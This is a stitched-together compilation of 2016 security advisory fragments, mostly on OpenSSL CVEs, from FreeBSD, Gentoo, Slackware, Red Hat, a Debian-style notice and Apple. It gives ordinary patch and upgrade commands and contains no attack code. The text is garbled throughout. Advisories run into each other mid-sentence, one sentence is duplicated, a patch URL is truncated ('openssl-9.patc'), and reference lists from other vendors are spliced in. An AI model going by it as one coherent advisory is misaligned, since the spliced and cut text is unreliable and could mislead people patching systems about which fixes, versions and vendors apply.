after the correction date. \n\nRestart all daemons that use the library, or reboot the system. \n\n2) To update your vulnerable system via a binary patch:\n\nSystems running a RELEASE version of FreeBSD on the i386 or amd64\nplatforms can be updated via the freebsd-update(8) utility:\n\n# freebsd-update fetch\n# freebsd-update install\n\nRestart all daemons that use the library, or reboot the system. \n\n3) To update your vulnerable system via a source code patch:\n\nThe following patches have been verified to apply to the applicable\nFreeBSD release branches. \n\na) Download the relevant patch from the location below, and verify the\ndetached PGP signature using your PGP utility. \n\n[FreeBSD 10.x]\n# fetch https://security.FreeBSD.org/patches/SA-16:17/openssl-10.patch\n# fetch https://security.FreeBSD.org/patches/SA-16:17/openssl-10.patch.asc\n# gpg --verify openssl-10.patch.asc\n\n[FreeBSD 9.3]\n# fetch https://security.FreeBSD.org/patches/SA-16:17/openssl-9.patc\n# fetch https://security.FreeBSD.org/patches/SA-16:17/openssl-9.patch.asc\n# gpg --verify openssl-9.patch.asc\n\nb) Apply the patch.  Execute the following commands as root:\n\n# cd /usr/src\n# patch \u003c /path/to/patch\n\nc) Recompile the operating system using buildworld and installworld as\ndescribed in \u003cURL:https://www.FreeBSD.org/handbook/makeworld.html\u003e. \n\nRestart all daemons that use the library, or reboot the system. \n\nVI.  Correction details\n\nThe following list contains the correction revision numbers for each\naffected branch. \n\nBranch/path                                                      Revision\n- -------------------------------------------------------------------------\nstable/9/                                                         r299053\nreleng/9.3/                                                       r299068\nstable/10/                                                        r298999\nreleng/10.1/                                                      r299068\nreleng/10.2/                                                      r299067\nreleng/10.3/                                                      r299066\n- -------------------------------------------------------------------------\n\nTo see which files were modified by a particular revision, run the\nfollowing command, replacing NNNNNN with the revision number, on a\nmachine with Subversion installed:\n\n# svn diff -cNNNNNN --summarize svn://svn.freebsd.org/base\n\nOr visit the following URL, replacing NNNNNN with the revision number:\n\n\u003cURL:https://svnweb.freebsd.org/base?view=revision\u0026revision=NNNNNN\u003e\n\nVII. \n- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\nGentoo Linux Security Advisory                           GLSA 201612-16\n- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\n                                           https://security.gentoo.org/\n- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\n\n Severity: Normal\n    Title: OpenSSL: Multiple vulnerabilities\n     Date: December 07, 2016\n     Bugs: #581234, #585142, #585276, #591454, #592068, #592074,\n           #592082, #594500, #595186\n       ID: 201612-16\n\n- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\n\nSynopsis\n========\n\nMultiple vulnerabilities have been found in OpenSSL, the worst of which\nallows attackers to conduct a time based side-channel attack. \n\nAffected packages\n=================\n\n    -------------------------------------------------------------------\n     Package              /     Vulnerable     /            Unaffected\n    -------------------------------------------------------------------\n  1  dev-libs/openssl             \u003c 1.0.2j                  \u003e= 1.0.2j\n\nDescription\n===========\n\nMultiple vulnerabilities have been discovered in OpenSSL. Please review\nthe CVE identifiers and the International Association for Cryptologic\nResearch\u0027s (IACR) paper, \"Make Sure DSA Signing Exponentiations Really\nare Constant-Time\" for further details. Additionally, a time based side-channel\nattack may allow a local attacker to recover a private DSA key. \n\nResolution\n==========\n\nAll OpenSSL users should upgrade to the latest version:\n\n  # emerge --sync\n   # emerge --ask --oneshot --verbose \"\u003e=dev-libs/openssl-1.0.2j\"\n\nReferences\n==========\n\n[  1 ] CVE-2016-2105\n       http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-2105\n[  2 ] CVE-2016-2106\n       http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-2106\n[  3 ] CVE-2016-2107\n       http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-2107\n[  4 ] CVE-2016-2108\n       http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-2108\n[  5 ] CVE-2016-2109\n       http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-2109\n[  6 ] CVE-2016-2176\n       http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-2176\n[  7 ] CVE-2016-2177\n       http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-2177\n[  8 ] CVE-2016-2178\n       http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-2178\n[  9 ] CVE-2016-2180\n       http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-2180\n[ 10 ] CVE-2016-2183\n       http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-2183\n[ 11 ] CVE-2016-6304\n       http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-6304\n[ 12 ] CVE-2016-6305\n       http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-6305\n[ 13 ] CVE-2016-6306\n       http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-6306\n[ 14 ] CVE-2016-7052\n       http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-7052\n[ 15 ] Make Sure DSA Signing Exponentiations Really are Constant-Time\n       http://eprint.iacr.org/2016/594.pdf\n\nAvailability\n============\n\nThis GLSA and any updates to it are available for viewing at\nthe Gentoo Security Website:\n\n https://security.gentoo.org/glsa/201612-16\n\nConcerns?\n=========\n\nSecurity is a primary focus of Gentoo Linux and ensuring the\nconfidentiality and security of our users\u0027 machines is of utmost\nimportance to us. Any security concerns should be addressed to\nsecurity@gentoo.org or alternatively, you may file a bug at\nhttps://bugs.gentoo.org. \n\nLicense\n=======\n\nCopyright 2016 Gentoo Foundation, Inc; referenced text\nbelongs to its owner(s). \n\nThe contents of this document are licensed under the\nCreative Commons - Attribution / Share Alike license. \n\nhttp://creativecommons.org/licenses/by-sa/2.5\n\n\n. \n\n\nHere are the details from the Slackware 14.1 ChangeLog:\n+--------------------------+\npatches/packages/openssl-1.0.1t-i486-1_slack14.1.txz:  Upgraded. \n+--------------------------+\n\n\nWhere to find the new packages:\n+-----------------------------+\n\nThanks to the friendly folks at the OSU Open Source Lab\n(http://osuosl.org) for donating FTP and rsync hosting\nto the Slackware project!  :-)\n\nAlso see the \"Get Slack\" section on http://slackware.com for\nadditional mirror sites near you. \n\nUpdated packages for Slackware 14.0:\nftp://ftp.slackware.com/pub/slackware/slackware-14.0/patches/packages/openssl-1.0.1t-i486-1_slack14.0.txz\nftp://ftp.slackware.com/pub/slackware/slackware-14.0/patches/packages/openssl-solibs-1.0.1t-i486-1_slack14.0.txz\n\nUpdated packages for Slackware x86_64 14.0:\nftp://ftp.slackware.com/pub/slackware/slackware64-14.0/patches/packages/openssl-1.0.1t-x86_64-1_slack14.0.txz\nftp://ftp.slackware.com/pub/slackware/slackware64-14.0/patches/packages/openssl-solibs-1.0.1t-x86_64-1_slack14.0.txz\n\nUpdated packages for Slackware 14.1:\nftp://ftp.slackware.com/pub/slackware/slackware-14.1/patches/packages/openssl-1.0.1t-i486-1_slack14.1.txz\nftp://ftp.slackware.com/pub/slackware/slackware-14.1/patches/packages/openssl-solibs-1.0.1t-i486-1_slack14.1.txz\n\nUpdated packages for Slackware x86_64 14.1:\nftp://ftp.slackware.com/pub/slackware/slackware64-14.1/patches/packages/openssl-1.0.1t-x86_64-1_slack14.1.txz\nftp://ftp.slackware.com/pub/slackware/slackware64-14.1/patches/packages/openssl-solibs-1.0.1t-x86_64-1_slack14.1.txz\n\nUpdated packages for Slackware -current:\nftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/a/openssl-solibs-1.0.2h-i586-1.txz\nftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/n/openssl-1.0.2h-i586-1.txz\n\nUpdated packages for Slackware x86_64 -current:\nftp://ftp.slackware.com/pub/slackware/slackware64-current/slackware64/a/openssl-solibs-1.0.2h-x86_64-1.txz\nftp://ftp.slackware.com/pub/slackware/slackware64-current/slackware64/n/openssl-1.0.2h-x86_64-1.txz\n\n\nMD5 signatures:\n+-------------+\n\nSlackware 14.0 packages:\n033bd9509aeb07712e6bb3adf89c18e4  openssl-1.0.1t-i486-1_slack14.0.txz\n9e91d781e33f7af80cbad08b245e84ed  openssl-solibs-1.0.1t-i486-1_slack14.0.txz\n\nSlackware x86_64 14.0 packages:\ne5c77ec16e3f2fcb2f1d53d84a6ba951  openssl-1.0.1t-x86_64-1_slack14.0.txz\n2de7b6196a905233036d7f38008984bd  openssl-solibs-1.0.1t-x86_64-1_slack14.0.txz\n\nSlackware 14.1 packages:\n96dcae05ae2f585c30de852a55eb870f  openssl-1.0.1t-i486-1_slack14.1.txz\n59618b061e62fd9d73ba17df7626b2e7  openssl-solibs-1.0.1t-i486-1_slack14.1.txz\n\nSlackware x86_64 14.1 packages:\n3d5ebfce099917703d537ab603e58a9b  openssl-1.0.1t-x86_64-1_slack14.1.txz\nbf3a6bbdbe835dd2ce73333822cc9f06  openssl-solibs-1.0.1t-x86_64-1_slack14.1.txz\n\nSlackware -current packages:\n4889a10c5f3aa7104167c7d50eedf7ea  a/openssl-solibs-1.0.2h-i586-1.txz\n8e3439f35c3cb4e11ca64eebb238a52f  n/openssl-1.0.2h-i586-1.txz\n\nSlackware x86_64 -current packages:\nb4a852bb7e86389ec228288ccb7e79bb  a/openssl-solibs-1.0.2h-x86_64-1.txz\nbcf9dc7bb04173f002644e3ce33ab4ab  n/openssl-1.0.2h-x86_64-1.txz\n\n\nInstallation instructions:\n+------------------------+\n\nUpgrade the packages as root:\n# upgradepkg openssl-1.0.1t-i486-1_slack14.1.txz openssl-solibs-1.0.1t-i486-1_slack14.1.txz \n\nThen, reboot the machine or restart any network services that use OpenSSL. \n\n\n+-----+\n\nSlackware Linux Security Team\nhttp://slackware.com/gpg-key\nsecurity@slackware.com\n\n+------------------------------------------------------------------------+\n| To leave the slackware-security mailing list:                          |\n+------------------------------------------------------------------------+\n| Send an email to majordomo@slackware.com with this text in the body of |\n| the email message:                                                     |\n|                                                                        |\n|   unsubscribe slackware-security                                       |\n|                                                                        |\n| You will get a confirmation message back containing instructions to    |\n| complete the process.  Please do not reply to this email address. -----BEGIN PGP SIGNED MESSAGE-----\nHash: SHA1\n\n=====================================================================\n                   Red Hat Security Advisory\n\nSynopsis:          Important: openssl security update\nAdvisory ID:       RHSA-2016:0996-01\nProduct:           Red Hat Enterprise Linux\nAdvisory URL:      https://rhn.redhat.com/errata/RHSA-2016-0996.html\nIssue date:        2016-05-10\nCVE Names:         CVE-2016-0799 CVE-2016-2105 CVE-2016-2106 \n                   CVE-2016-2107 CVE-2016-2108 CVE-2016-2109 \n                   CVE-2016-2842 \n=====================================================================\n\n1. Summary:\n\nAn update for openssl is now available for Red Hat Enterprise Linux 6. \n\nRed Hat Product Security has rated this update as having a security impact\nof Important. A Common Vulnerability Scoring System (CVSS) base score,\nwhich gives a detailed severity rating, is available for each vulnerability\nfrom the CVE link(s) in the References section. \n\n2. Relevant releases/architectures:\n\nRed Hat Enterprise Linux Desktop (v. 6) - i386, x86_64\nRed Hat Enterprise Linux Desktop Optional (v. 6) - i386, x86_64\nRed Hat Enterprise Linux HPC Node (v. 6) - x86_64\nRed Hat Enterprise Linux HPC Node Optional (v. 6) - x86_64\nRed Hat Enterprise Linux Server (v. 6) - i386, ppc64, s390x, x86_64\nRed Hat Enterprise Linux Server Optional (v. 6) - i386, ppc64, s390x, x86_64\nRed Hat Enterprise Linux Workstation (v. 6) - i386, x86_64\nRed Hat Enterprise Linux Workstation Optional (v. 6) - i386, x86_64\n\n3. Description:\n\nOpenSSL is a toolkit that implements the Secure Sockets Layer (SSL) and\nTransport Layer Security (TLS) protocols, as well as a full-strength\ngeneral-purpose cryptography library. \n\nSecurity Fix(es):\n\n* A flaw was found in the way OpenSSL encoded certain ASN.1 data\nstructures. An attacker could use this flaw to create a specially crafted\ncertificate which, when verified or re-encoded by OpenSSL, could cause it\nto crash, or execute arbitrary code using the permissions of the user\nrunning an application compiled against the OpenSSL library. \n(CVE-2016-2108)\n\n* Two integer overflow flaws, leading to buffer overflows, were found in\nthe way the EVP_EncodeUpdate() and EVP_EncryptUpdate() functions of OpenSSL\nparsed very large amounts of input data. A remote attacker could use these\nflaws to crash an application using OpenSSL or, possibly, execute arbitrary\ncode with the permissions of the user running that application. \n(CVE-2016-2105, CVE-2016-2106)\n\n* It was discovered that OpenSSL leaked timing information when decrypting\nTLS/SSL and DTLS protocol encrypted records when the connection used the\nAES CBC cipher suite and the server supported AES-NI. A remote attacker\ncould possibly use this flaw to retrieve plain text from encrypted packets\nby using a TLS/SSL or DTLS server as a padding oracle. (CVE-2016-2107)\n\n* Several flaws were found in the way BIO_*printf functions were\nimplemented in OpenSSL. Applications which passed large amounts of\nuntrusted data through these functions could crash or potentially execute\ncode with the permissions of the user running such an application. \n(CVE-2016-0799, CVE-2016-2842)\n\n* A denial of service flaw was found in the way OpenSSL parsed certain\nASN.1-encoded data from BIO (OpenSSL\u0027s I/O abstraction) inputs. An\napplication using OpenSSL that accepts untrusted ASN.1 BIO input could be\nforced to allocate an excessive amount of data. (CVE-2016-2109)\n\nRed Hat would like to thank the OpenSSL project for reporting\nCVE-2016-2108, CVE-2016-2842, CVE-2016-2105, CVE-2016-2106, CVE-2016-2107,\nand CVE-2016-0799. Upstream acknowledges Huzaifa Sidhpurwala (Red Hat),\nHanno B\u00f6ck, and David Benjamin (Google) as the original reporters of\nCVE-2016-2108; Guido Vranken as the original reporter of CVE-2016-2842,\nCVE-2016-2105, CVE-2016-2106, and CVE-2016-0799; and Juraj Somorovsky as\nthe original reporter of CVE-2016-2107. \n\n4. Solution:\n\nFor details on how to apply this update, which includes the changes\ndescribed in this advisory, refer to:\n\nhttps://access.redhat.com/articles/11258\n\nFor the update to take effect, all services linked to the OpenSSL library\nmust be restarted, or the system rebooted. \n\n5. Bugs fixed (https://bugzilla.redhat.com/):\n\n1312219 - CVE-2016-0799 OpenSSL: Fix memory issues in BIO_*printf functions\n1314757 - CVE-2016-2842 openssl: doapr_outch function does not verify that certain memory allocation succeeds\n1330101 - CVE-2016-2109 openssl: ASN.1 BIO handling of large amounts of data\n1331402 - CVE-2016-2108 openssl: Memory corruption in the ASN.1 encoder\n1331426 - CVE-2016-2107 openssl: Padding oracle in AES-NI CBC MAC check\n1331441 - CVE-2016-2105 openssl: EVP_EncodeUpdate overflow\n1331536 - CVE-2016-2106 openssl: EVP_EncryptUpdate overflow\n\n6. Package List:\n\nRed Hat Enterprise Linux Desktop (v. 6):\n\nSource:\nopenssl-1.0.1e-48.el6_8.1.src.rpm\n\ni386:\nopenssl-1.0.1e-48.el6_8.1.i686.rpm\nopenssl-debuginfo-1.0.1e-48.el6_8.1.i686.rpm\n\nx86_64:\nopenssl-1.0.1e-48.el6_8.1.i686.rpm\nopenssl-1.0.1e-48.el6_8.1.x86_64.rpm\nopenssl-debuginfo-1.0.1e-48.el6_8.1.i686.rpm\nopenssl-debuginfo-1.0.1e-48.el6_8.1.x86_64.rpm\n\nRed Hat Enterprise Linux Desktop Optional (v. 6):\n\ni386:\nopenssl-debuginfo-1.0.1e-48.el6_8.1.i686.rpm\nopenssl-devel-1.0.1e-48.el6_8.1.i686.rpm\nopenssl-perl-1.0.1e-48.el6_8.1.i686.rpm\nopenssl-static-1.0.1e-48.el6_8.1.i686.rpm\n\nx86_64:\nopenssl-debuginfo-1.0.1e-48.el6_8.1.i686.rpm\nopenssl-debuginfo-1.0.1e-48.el6_8.1.x86_64.rpm\nopenssl-devel-1.0.1e-48.el6_8.1.i686.rpm\nopenssl-devel-1.0.1e-48.el6_8.1.x86_64.rpm\nopenssl-perl-1.0.1e-48.el6_8.1.x86_64.rpm\nopenssl-static-1.0.1e-48.el6_8.1.x86_64.rpm\n\nRed Hat Enterprise Linux HPC Node (v. 6):\n\nSource:\nopenssl-1.0.1e-48.el6_8.1.src.rpm\n\nx86_64:\nopenssl-1.0.1e-48.el6_8.1.i686.rpm\nopenssl-1.0.1e-48.el6_8.1.x86_64.rpm\nopenssl-debuginfo-1.0.1e-48.el6_8.1.i686.rpm\nopenssl-debuginfo-1.0.1e-48.el6_8.1.x86_64.rpm\n\nRed Hat Enterprise Linux HPC Node Optional (v. 6):\n\nx86_64:\nopenssl-debuginfo-1.0.1e-48.el6_8.1.i686.rpm\nopenssl-debuginfo-1.0.1e-48.el6_8.1.x86_64.rpm\nopenssl-devel-1.0.1e-48.el6_8.1.i686.rpm\nopenssl-devel-1.0.1e-48.el6_8.1.x86_64.rpm\nopenssl-perl-1.0.1e-48.el6_8.1.x86_64.rpm\nopenssl-static-1.0.1e-48.el6_8.1.x86_64.rpm\n\nRed Hat Enterprise Linux Server (v. 6):\n\nSource:\nopenssl-1.0.1e-48.el6_8.1.src.rpm\n\ni386:\nopenssl-1.0.1e-48.el6_8.1.i686.rpm\nopenssl-debuginfo-1.0.1e-48.el6_8.1.i686.rpm\nopenssl-devel-1.0.1e-48.el6_8.1.i686.rpm\n\nppc64:\nopenssl-1.0.1e-48.el6_8.1.ppc.rpm\nopenssl-1.0.1e-48.el6_8.1.ppc64.rpm\nopenssl-debuginfo-1.0.1e-48.el6_8.1.ppc.rpm\nopenssl-debuginfo-1.0.1e-48.el6_8.1.ppc64.rpm\nopenssl-devel-1.0.1e-48.el6_8.1.ppc.rpm\nopenssl-devel-1.0.1e-48.el6_8.1.ppc64.rpm\n\ns390x:\nopenssl-1.0.1e-48.el6_8.1.s390.rpm\nopenssl-1.0.1e-48.el6_8.1.s390x.rpm\nopenssl-debuginfo-1.0.1e-48.el6_8.1.s390.rpm\nopenssl-debuginfo-1.0.1e-48.el6_8.1.s390x.rpm\nopenssl-devel-1.0.1e-48.el6_8.1.s390.rpm\nopenssl-devel-1.0.1e-48.el6_8.1.s390x.rpm\n\nx86_64:\nopenssl-1.0.1e-48.el6_8.1.i686.rpm\nopenssl-1.0.1e-48.el6_8.1.x86_64.rpm\nopenssl-debuginfo-1.0.1e-48.el6_8.1.i686.rpm\nopenssl-debuginfo-1.0.1e-48.el6_8.1.x86_64.rpm\nopenssl-devel-1.0.1e-48.el6_8.1.i686.rpm\nopenssl-devel-1.0.1e-48.el6_8.1.x86_64.rpm\n\nRed Hat Enterprise Linux Server Optional (v. 6):\n\ni386:\nopenssl-debuginfo-1.0.1e-48.el6_8.1.i686.rpm\nopenssl-perl-1.0.1e-48.el6_8.1.i686.rpm\nopenssl-static-1.0.1e-48.el6_8.1.i686.rpm\n\nppc64:\nopenssl-debuginfo-1.0.1e-48.el6_8.1.ppc64.rpm\nopenssl-perl-1.0.1e-48.el6_8.1.ppc64.rpm\nopenssl-static-1.0.1e-48.el6_8.1.ppc64.rpm\n\ns390x:\nopenssl-debuginfo-1.0.1e-48.el6_8.1.s390x.rpm\nopenssl-perl-1.0.1e-48.el6_8.1.s390x.rpm\nopenssl-static-1.0.1e-48.el6_8.1.s390x.rpm\n\nx86_64:\nopenssl-debuginfo-1.0.1e-48.el6_8.1.x86_64.rpm\nopenssl-perl-1.0.1e-48.el6_8.1.x86_64.rpm\nopenssl-static-1.0.1e-48.el6_8.1.x86_64.rpm\n\nRed Hat Enterprise Linux Workstation (v. 6):\n\nSource:\nopenssl-1.0.1e-48.el6_8.1.src.rpm\n\ni386:\nopenssl-1.0.1e-48.el6_8.1.i686.rpm\nopenssl-debuginfo-1.0.1e-48.el6_8.1.i686.rpm\nopenssl-devel-1.0.1e-48.el6_8.1.i686.rpm\n\nx86_64:\nopenssl-1.0.1e-48.el6_8.1.i686.rpm\nopenssl-1.0.1e-48.el6_8.1.x86_64.rpm\nopenssl-debuginfo-1.0.1e-48.el6_8.1.i686.rpm\nopenssl-debuginfo-1.0.1e-48.el6_8.1.x86_64.rpm\nopenssl-devel-1.0.1e-48.el6_8.1.i686.rpm\nopenssl-devel-1.0.1e-48.el6_8.1.x86_64.rpm\n\nRed Hat Enterprise Linux Workstation Optional (v. 6):\n\ni386:\nopenssl-debuginfo-1.0.1e-48.el6_8.1.i686.rpm\nopenssl-perl-1.0.1e-48.el6_8.1.i686.rpm\nopenssl-static-1.0.1e-48.el6_8.1.i686.rpm\n\nx86_64:\nopenssl-debuginfo-1.0.1e-48.el6_8.1.x86_64.rpm\nopenssl-perl-1.0.1e-48.el6_8.1.x86_64.rpm\nopenssl-static-1.0.1e-48.el6_8.1.x86_64.rpm\n\nThese packages are GPG signed by Red Hat for security.  Our key and\ndetails on how to verify the signature are available from\nhttps://access.redhat.com/security/team/key/\n\n7. References:\n\nhttps://access.redhat.com/security/cve/CVE-2016-0799\nhttps://access.redhat.com/security/cve/CVE-2016-2105\nhttps://access.redhat.com/security/cve/CVE-2016-2106\nhttps://access.redhat.com/security/cve/CVE-2016-2107\nhttps://access.redhat.com/security/cve/CVE-2016-2108\nhttps://access.redhat.com/security/cve/CVE-2016-2109\nhttps://access.redhat.com/security/cve/CVE-2016-2842\nhttps://access.redhat.com/security/updates/classification/#important\n\n8. Contact:\n\nThe Red Hat security contact is \u003csecalert@redhat.com\u003e. More contact\ndetails at https://access.redhat.com/security/team/contact/\n\nCopyright 2016 Red Hat, Inc. \n-----BEGIN PGP SIGNATURE-----\nVersion: GnuPG v1\n\niD8DBQFXMXPXXlSAg2UNWIIRAmqpAJ4sxaxPc4fbLjR32h/PW1fxwOZG7ACgtaSz\n6dbI0EemYRoHCDagPHSycq4=\n=g2Zb\n-----END PGP SIGNATURE-----\n\n\n--\nRHSA-announce mailing list\nRHSA-announce@redhat.com\nhttps://www.redhat.com/mailman/listinfo/rhsa-announce. This could lead to a heap corruption. \n    This could lead to a heap corruption. \n\nCVE-2016-2108\n\n    David Benjamin from Google discovered that two separate bugs in the\n    ASN.1 encoder, related to handling of negative zero integer values\n    and large universal tags, could lead to an out-of-bounds write. This could result in arbitrary stack data\n    being returned in the buffer. \n\nAdditional information about these issues can be found in the OpenSSL\nsecurity advisory at https://www.openssl.org/news/secadv/20160503.txt\n\nFor the stable distribution (jessie), these problems have been fixed in\nversion 1.0.1k-3+deb8u5. \n\nFor the unstable distribution (sid), these problems have been fixed in\nversion 1.0.2h-1. \n\nWe recommend that you upgrade your openssl packages. \n\nReferences:\n\n  - CVE-2016-2107 - OpenSSL, Unauthorized disclosure of information\n  - CVE-2016-2106 - OpenSSL, Denial of Service (DoS)\n  - CVE-2016-2109 - OpenSSL, Denial of Service (DoS)\n  - CVE-2016-2105 - OpenSSL, Denial of Service (DoS)\n  - CVE-2016-3739 - cURL and libcurl, Remote code execution\n  - CVE-2016-5388 - \"HTTPoxy\", Apache Tomcat\n  - CVE-2016-5387 - \"HTTPoxy\", Apache HTTP Server\n  - CVE-2016-5385 - \"HTTPoxy\", PHP \n  - CVE-2016-4543 - PHP, multiple impact\n  - CVE-2016-4071 - PHP, multiple impact\n  - CVE-2016-4072 - PHP, multiple impact\n  - CVE-2016-4542 - PHP, multiple impact\n  - CVE-2016-4541 - PHP, multiple impact\n  - CVE-2016-4540 - PHP, multiple impact\n  - CVE-2016-4539 - PHP, multiple impact\n  - CVE-2016-4538 - PHP, multiple impact\n  - CVE-2016-4537 - PHP, multiple impact\n  - CVE-2016-4343 - PHP, multiple impact\n  - CVE-2016-4342 - PHP, multiple impact\n  - CVE-2016-4070 - PHP, Denial of Service (DoS)\n  - CVE-2016-4393 - PSRT110263, XSS vulnerability\n  - CVE-2016-4394 - PSRT110263, HSTS vulnerability\n  - CVE-2016-4395 - ZDI-CAN-3722, PSRT110115, Buffer Overflow\n  - CVE-2016-4396 - ZDI-CAN-3730, PSRT110116, Buffer Overflow\n  - PSRT110145\n  - PSRT110263\n  - PSRT110115\n  - PSRT110116\n\nSUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed. -----BEGIN PGP SIGNED MESSAGE-----\nHash: SHA512\n\nAPPLE-SA-2016-07-18-1 OS X El Capitan v10.11.6 and Security Update\n2016-004\n\nOS X El Capitan v10.11.6 and Security Update 2016-004 is now\navailable and addresses the following:\n\napache_mod_php\nAvailable for:  \nOS X Yosemite v10.10.5 and OS X El Capitan v10.11 and later\nImpact:  A remote attacker may be able to execute arbitrary code\nDescription:  Multiple issues existed in PHP versions prior to\n5.5.36. These were addressed by updating PHP to version 5.5.36. \nCVE-2016-4650\n\nAudio\nAvailable for:  OS X El Capitan v10.11 and later\nImpact:  A local user may be able to execute arbitrary code with\nkernel privileges\nDescription:  A memory corruption issue was addressed through\nimproved memory handling. \nCVE-2016-4647 : Juwei Lin (@fuzzerDOTcn) of Trend Micro\n\nAudio\nAvailable for:  OS X El Capitan v10.11 and later\nImpact:  A local user may be able to determine kernel memory layout\nDescription:  An out-of-bounds read was addressed through improved\ninput validation. \nCVE-2016-4648 : Juwei Lin(@fuzzerDOTcn) of Trend Micro\n\nAudio\nAvailable for:  OS X El Capitan v10.11 and later\nImpact:  Parsing a maliciously crafted audio file may lead to the\ndisclosure of user information\nDescription:  An out-of-bounds read was addressed through improved\nbounds checking. \nCVE-2016-4646 : Steven Seeley of Source Incite working with Trend\nMicro\u0027s Zero Day Initiative\n\nAudio\nAvailable for:  OS X El Capitan v10.11 and later\nImpact:  A local user may be able to cause a system denial of service\nDescription:  A null pointer dereference was addressed through\nimproved input validation. \nCVE-2016-4649 : Juwei Lin(@fuzzerDOTcn) of Trend Micro\n\nbsdiff\nAvailable for:  OS X El Capitan v10.11 and later\nImpact:  A local attacker may be able to cause unexpected application\ntermination or arbitrary code execution\nDescription:  An integer overflow existed in bspatch. This issue was\naddressed through improved bounds checking. \nCVE-2014-9862 : an anonymous researcher\n\nCFNetwork\nAvailable for:  OS X El Capitan v10.11 and later\nImpact:  A local user may be able to view sensitive user information\nDescription:  A permissions issue existed in the handling of web\nbrowser cookies. This issue was addressed through improved\nrestrictions. \nCVE-2016-4645 : Abhinav Bansal of Zscaler Inc. \n\nCoreGraphics\nAvailable for:  OS X Mavericks v10.9.5, OS X Yosemite v10.10.5,\nand OS X El Capitan v10.11 and later\nImpact:  A remote attacker may be able to execute arbitrary code\nDescription:  A memory corruption issue was addressed through\nimproved memory handling. \nCVE-2016-4637 : Tyler Bohan of Cisco Talos (talosintel.com\n/vulnerability-reports)\n\nCoreGraphics\nAvailable for:  OS X El Capitan v10.11 and later\nImpact:  A local user may be able to elevate privileges\nDescription:  An out-of-bounds read issue existed that led to the\ndisclosure of kernel memory. This was addressed through improved\ninput validation. \nCVE-2016-4652 : Yubin Fu of Tencent KeenLab working with Trend\nMicro\u0027s Zero Day Initiative\n\nFaceTime\nAvailable for:  OS X El Capitan v10.11 and later\nImpact:  An attacker in a privileged network position may be able to\ncause a relayed call to continue transmitting audio while appearing\nas if the call terminated\nDescription:  User interface inconsistencies existed in the handling\nof relayed calls. These issues were addressed through improved\nFaceTime display logic. \nCVE-2016-4635 : Martin Vigo\n\nGraphics Drivers\nAvailable for:  OS X El Capitan v10.11 and later\nImpact:  A local user may be able to execute arbitrary code with\nkernel privileges\nDescription:  A memory corruption issue was addressed through\nimproved input validation. \nCVE-2016-4634 : Stefan Esser of SektionEins\n\nImageIO\nAvailable for:  OS X El Capitan v10.11 and later\nImpact:  A remote attacker may be able to cause a denial of service\nDescription:  A memory consumption issue was addressed through\nimproved memory handling. \nCVE-2016-4632 : Evgeny Sidorov of Yandex\n\nImageIO\nAvailable for:  OS X El Capitan v10.11 and later\nImpact:  A remote attacker may be able to execute arbitrary code\nDescription:  Multiple memory corruption issues were addressed\nthrough improved memory handling. \nCVE-2016-4631 : Tyler Bohan of Cisco Talos (talosintel.com\n/vulnerability-reports)\n\nImageIO\nAvailable for:  OS X Mavericks v10.9.5, OS X Yosemite v10.10.5,\nand OS X El Capitan v10.11 and later\nImpact:  A remote attacker may be able to execute arbitrary code\nDescription:  Multiple memory corruption issues were addressed\nthrough improved memory handling. \nCVE-2016-4629 : Tyler Bohan of Cisco Talos (talosintel.com\n/vulnerability-reports)\nCVE-2016-4630 : Tyler Bohan of Cisco Talos (talosintel.com\n/vulnerability-reports)\n\nIntel Graphics Driver\nAvailable for:  OS X El Capitan v10.11 and later\nImpact:  A malicious application may be able to execute arbitrary\ncode with kernel privileges\nDescription:  Multiple memory corruption issues were addressed\nthrough improved memory handling. \nCVE-2016-4633 : an anonymous researcher\n\nIOHIDFamily\nAvailable for:  OS X El Capitan v10.11 and later\nImpact:  A local user may be able to execute arbitrary code with\nkernel privileges\nDescription:  A null pointer dereference was addressed through\nimproved input validation. \nCVE-2016-4626 : Stefan Esser of SektionEins\n\nIOSurface\nAvailable for:  OS X El Capitan v10.11 and later\nImpact:  A local user may be able to execute arbitrary code with\nkernel privileges\nDescription:  A use-after-free was addressed through improved memory\nmanagement. \nCVE-2016-4625 : Ian Beer of Google Project Zero\n\nKernel\nAvailable for:  OS X El Capitan v10.11 and later\nImpact:  A local user may be able to execute arbitrary code with\nkernel privileges\nDescription:  Multiple memory corruption issues were addressed\nthrough improved memory handling. \nCVE-2016-1863 : Ian Beer of Google Project Zero\nCVE-2016-1864 : Ju Zhu of Trend Micro\nCVE-2016-4582 : Shrek_wzw and Proteas of Qihoo 360 Nirvan Team\n\nKernel\nAvailable for:  OS X El Capitan v10.11 and later\nImpact:  A local user may be able to cause a system denial of service\nDescription:  A null pointer dereference was addressed through\nimproved input validation. \nCVE-2016-1865 : CESG, Marco Grassi (@marcograss) of KeenLab\n(@keen_lab), Tencent\n\nlibc++abi\nAvailable for:  OS X El Capitan v10.11 and later\nImpact:  An application may be able to execute arbitrary code with\nroot privileges\nDescription:  Multiple memory corruption issues were addressed\nthrough improved memory handling. \nCVE-2016-4621 : an anonymous researcher\n\nlibexpat\nAvailable for:  OS X El Capitan v10.11 and later\nImpact:  Processing maliciously crafted XML may lead to unexpected\napplication termination or arbitrary code execution\nDescription:  Multiple memory corruption issues were addressed\nthrough improved memory handling. \nCVE-2016-0718 : Gustavo Grieco\n\nLibreSSL\nAvailable for:  OS X El Capitan v10.11 and later\nImpact:  A remote attacker may be able to execute arbitrary code\nDescription:  